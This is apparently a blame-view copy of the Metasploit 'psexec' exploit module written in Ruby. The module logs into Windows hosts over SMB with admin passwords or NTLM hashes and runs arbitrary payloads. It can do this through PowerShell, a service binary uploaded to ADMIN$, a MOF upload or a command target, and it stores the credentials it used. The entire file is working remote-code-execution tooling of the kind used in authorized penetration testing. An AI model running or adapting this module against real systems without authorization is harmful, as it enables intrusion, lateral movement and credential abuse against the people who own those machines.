Files
metasploit-gs/modules/exploits/windows/smb/psexec.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

231 lines
7.5 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2014-07-16 15:29:23 -05:00
# Windows XP systems that are not part of a domain default to treating all
# network logons as if they were Guest. This prevents SMB relay attacks from
# gaining administrative access to these systems. This setting can be found
# under:
#
# Local Security Settings >
# Local Policies >
# Security Options >
# Network Access: Sharing and security model for local accounts
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2010-09-20 02:56:29 +00:00
Rank = ManualRanking
2013-08-30 16:28:54 -05:00
2015-02-13 17:17:59 -06:00
include Msf::Exploit::Remote::SMB::Client::Psexec
2015-10-30 16:21:24 -05:00
include Msf::Exploit::Powershell
2010-09-21 00:13:30 +00:00
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
2015-10-30 16:21:24 -05:00
include Msf::Auxiliary::Report
include Msf::OptionalSession::SMB
2013-08-30 16:28:54 -05:00
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows Authenticated User Code Execution',
'Description' => %q{
This module uses a valid administrator username and password (or
password hash) to execute an arbitrary payload. This module is similar
to the "psexec" utility provided by SysInternals. This module is now able
to clean up after itself. The service created by this tool uses a randomly
2011-03-10 18:46:58 +00:00
chosen name and description.
},
'Author' =>
[
2010-06-21 03:49:39 +00:00
'hdm',
2015-10-30 16:21:24 -05:00
'Royce Davis <rdavis[at]accuvant.com>', # (@R3dy__) PSExec command module
'RageLtMan <rageltman[at]sempervictus>' # PSH exploit, libs, encoders
],
'License' => MSF_LICENSE,
'Privileged' => true,
'DefaultOptions' =>
{
'WfsDelay' => 10,
2015-10-30 16:21:24 -05:00
'EXITFUNC' => 'thread'
},
'References' =>
[
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
[ 'OSVDB', '3106'],
2015-10-30 16:21:24 -05:00
[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ],
[ 'URL', 'https://www.optiv.com/blog/owning-computers-without-shell-access' ],
2015-10-30 16:21:24 -05:00
[ 'URL', 'http://sourceforge.net/projects/smbexec/' ]
],
'Payload' =>
{
'Space' => 3072,
2016-03-30 23:38:46 -05:00
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
[ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
[ 'Native upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
[ 'MOF upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
2022-05-05 16:43:10 -04:00
[ 'Command', { 'Arch' => [ARCH_CMD], 'Payload' => { 'Space' => 8191 } } ]
],
2010-07-03 03:13:45 +00:00
'DefaultTarget' => 0,
2010-09-21 01:50:50 +00:00
# For the CVE, PsExec was first released around February or March 2001
2020-10-02 17:38:06 +01:00
'DisclosureDate' => '1999-01-01'
2010-07-03 03:13:45 +00:00
))
2013-08-30 16:28:54 -05:00
register_options(
[
OptString.new('SMBSHARE', [false, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", ''], aliases: ['SHARE'])
])
2013-08-30 16:28:54 -05:00
2010-07-03 03:13:45 +00:00
register_advanced_options(
[
OptBool.new('ALLOW_GUEST', [true, 'Keep trying if only given guest access', false]),
OptString.new('SERVICE_FILENAME', [false, 'Filename to to be used on target for the service binary', nil]),
OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),
2022-02-15 22:12:31 +00:00
OptString.new('SERVICE_STUB_ENCODER', [false, 'Encoder to use around the service registering stub', nil])
])
end
2013-08-30 16:28:54 -05:00
def native_upload_with_workaround(smbshare)
2020-05-14 16:41:54 -05:00
service_filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''
# Avoid implementing NTLMSSP on Windows XP
2018-09-15 18:54:45 -05:00
# https://seclists.org/metasploit/2009/q1/6
if smb_peer_os == "Windows 5.1"
connect(versions: [1])
smb_login
end
native_upload(smbshare, service_filename, service_encoder)
end
2020-10-27 15:05:23 +00:00
def validate_service_stub_encoder!
service_encoder = datastore['SERVICE_STUB_ENCODER']
return if service_encoder.nil? || service_encoder.empty?
encoder = framework.encoders[service_encoder]
if encoder.nil?
2021-06-03 11:43:09 +01:00
raise Msf::OptionValidateError.new(
{
'SERVICE_STUB_ENCODER' => "Failed to find encoder #{service_encoder.inspect}"
}
)
2020-10-27 15:05:23 +00:00
end
end
def exploit
2020-10-27 15:05:23 +00:00
validate_service_stub_encoder!
# automatically select an SMB share unless one is explicitly specified
if datastore['SMBSHARE'] && !datastore['SMBSHARE'].blank?
smbshare = datastore['SMBSHARE']
elsif target.name == 'Command'
smbshare = 'C$'
else
smbshare = 'ADMIN$'
end
2023-11-14 18:20:14 +00:00
create_simple_smb_client!
2014-06-02 14:53:40 -05:00
2015-10-30 16:21:24 -05:00
case target.name
when 'Automatic'
if powershell_installed?(smbshare, datastore['PSH_PATH'])
2015-10-30 16:21:24 -05:00
print_status('Selecting PowerShell target')
2018-04-25 08:56:54 +05:30
execute_powershell_payload
else
2015-10-30 16:21:24 -05:00
print_status('Selecting native target')
native_upload_with_workaround(smbshare)
end
2015-10-30 16:21:24 -05:00
when 'PowerShell'
2018-04-25 08:56:54 +05:30
execute_powershell_payload
2015-10-30 16:21:24 -05:00
when 'Native upload'
native_upload_with_workaround(smbshare)
2015-10-30 16:21:24 -05:00
when 'MOF upload'
mof_upload(smbshare)
when 'Command'
execute_command_payload(smbshare)
2015-10-30 16:21:24 -05:00
end
2014-06-02 14:20:54 -05:00
2015-10-30 16:21:24 -05:00
handler
disconnect
end
2018-04-24 23:00:55 +05:30
def report_auth
service_data = {
address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
port: datastore['RPORT'],
service_name: 'smb',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
private_data: datastore['SMBPass'],
username: datastore['SMBUser'].downcase
}
if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
credential_data.merge!({
realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
realm_value: datastore['SMBDomain']
})
end
if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
credential_data.merge!({:private_type => :ntlm_hash})
else
credential_data.merge!({:private_type => :password})
end
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
login_data = {
access_level: 'Admin',
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
2023-11-14 18:20:14 +00:00
def create_simple_smb_client!
if session
print_status("Using existing session #{session.sid}")
client = session.client
self.simple = ::Rex::Proto::SMB::SimpleClient.new(client.dispatcher.tcp_socket, client: client)
else
print_status('Connecting to the server...')
connect
print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
smb_login
if !simple.client.auth_user && !datastore['ALLOW_GUEST']
print_line
print_error(
'FAILED! The remote host has only provided us with Guest privileges. ' \
'Please make sure that the correct username and password have been provided. ' \
'Windows XP systems that are not part of a domain will only provide Guest privileges ' \
'to network logins by default.'
)
print_line
disconnect
return
end
unless datastore['SMBUser'].to_s.strip.empty?
report_auth
end
end
end
end